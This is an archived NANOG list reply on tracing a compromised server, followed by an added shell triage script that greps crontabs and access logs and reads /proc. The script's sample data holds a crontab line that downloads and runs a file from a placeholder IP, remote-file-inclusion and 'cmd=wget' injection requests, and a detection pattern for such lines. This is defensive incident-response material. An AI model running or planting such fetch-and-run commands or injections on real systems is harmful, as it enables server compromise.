[122940] in North American Network Operators' Group


Re: Security Guidance

daemon@ATHENA.MIT.EDU (Dan White)
Tue Feb 23 15:41:20 2010

Date: Tue, 23 Feb 2010 14:39:41 -0600
From: Dan White <dwhite@olp.net>
To: Ronald Cotoni <setient@gmail.com>
In-Reply-To: <2f1d68351002231219r1566504fx71c4a353eccee5c5@mail.gmail.com>
Cc: nanog@nanog.org
Errors-To: nanog-bounces+nanog.discuss=bloom-picayune.mit.edu@nanog.org

On 23/02/10 15:19 -0500, Ronald Cotoni wrote:
>Quick suggestion BUT you may want to have Parallels look into it if
>you can't seem to find it since you pay for the support anyways.  You
>may also want to check to see if it is a cron job that is doing it (if
>the machine was rootkitted, you may have accidentally copied a cron
>job over).  Another suggestion would be simply move half the accounts
>to one server and half to another and see if it DDoSes again and keep
>doing that until you find the problem account.

I'll second that. I've found a few interesting items in my
/var/spool/cron/crontab before.

Also check your web server logs. If someone has compromised an account via
an apache/php vulnerability, it might show up in your access/error log
(I saw 'wget' in my logs once).

I assume you've checked 'last' to make sure they're not getting in via a
remote shell.

ls -ltra is your friend when finding the most recently created files in your
filesystem.

If you suspect there's a running process doing it, look through your /proc
directory, like in /proc/<pid>/environ, /proc/<pid>/cmdline, etc.

-- 
Dan White
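The checks Dan lists (crontab entries, downloader commands in the web server logs, recently modified files, and /proc/<pid>/cmdline) gathered into one triage script. This is an added example, not code from Dan White or the NANOG thread; the crontab lines, access-log lines and IP addresses (documentation ranges) are constructed here so the script runs offline, and the `SUSPECT_RE` pattern list is an assumption about what is worth a second look, not a complete indicator set.

```shell
#!/bin/sh
# Added triage example for the thread above (not Dan White's or NANOG's code).
# Implements the checks the reply lists: suspicious crontab entries, downloader
# commands in web server access logs, recently modified files, and the
# command line of a running process read from /proc.
set -u

# Constructed sample data, written to a temporary directory so the script
# runs without touching the real crontab or web server logs.
SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT

cat > "$SAMPLE_DIR/crontab" <<'EOF'
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * wget -q -O /tmp/.x http://203.0.113.10/x && sh /tmp/.x
30 2 * * 0 /usr/sbin/logrotate /etc/logrotate.conf
EOF

cat > "$SAMPLE_DIR/access.log" <<'EOF'
198.51.100.7 - - [23/Feb/2010:14:01:02 -0600] "GET /index.php HTTP/1.1" 200 512
198.51.100.9 - - [23/Feb/2010:14:02:15 -0600] "GET /gallery.php?page=http://203.0.113.10/c.txt? HTTP/1.1" 200 88
198.51.100.9 - - [23/Feb/2010:14:02:16 -0600] "POST /gallery.php?cmd=wget%20http://203.0.113.10/x HTTP/1.1" 200 10
198.51.100.12 - - [23/Feb/2010:14:03:40 -0600] "GET /about.html HTTP/1.1" 200 2048
EOF

# Assumed patterns that warrant review in a crontab command: downloaders,
# scripts staged under world-writable directories, and encoded payloads.
SUSPECT_RE='wget|curl|/tmp/|/dev/shm/|base64'

# Print crontab lines (comments excluded) whose command matches SUSPECT_RE.
scan_crontab() {
    grep -v '^[[:space:]]*#' "$1" | grep -E "$SUSPECT_RE" || true
}

# Print access-log lines whose request carries a downloader command or a
# remote URL passed as a parameter (the usual remote-file-inclusion trace).
scan_access_log() {
    grep -E 'wget|curl|=https?(%3A|:)' "$1" || true
}

# List the N most recently modified regular files under a directory,
# newest last: the same ordering as "ls -ltra", applied recursively.
recent_files() {
    dir=$1; n=${2:-10}
    find "$dir" -type f -exec ls -ltr {} + | tail -n "$n"
}

# Print a process's NUL-separated command line in readable form.
# Prints nothing on systems without /proc or for a pid that has exited.
proc_cmdline() {
    if [ -r "/proc/$1/cmdline" ]; then
        tr '\0' ' ' < "/proc/$1/cmdline"
        echo
    fi
}

main() {
    echo "== crontab entries to review =="
    scan_crontab "$SAMPLE_DIR/crontab"
    echo "== access-log lines to review =="
    scan_access_log "$SAMPLE_DIR/access.log"
    echo "== most recently modified files in sample dir =="
    recent_files "$SAMPLE_DIR" 5
    echo "== command line of this shell (pid $$) =="
    proc_cmdline "$$"
}

main
```

On a real host, point `scan_crontab` at each file under /var/spool/cron (and /etc/cron.d), `scan_access_log` at the Apache access and error logs, and `recent_files` at the web root or /tmp; `proc_cmdline` takes any pid from `ps`, and /proc/<pid>/environ can be read the same way with `tr`.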

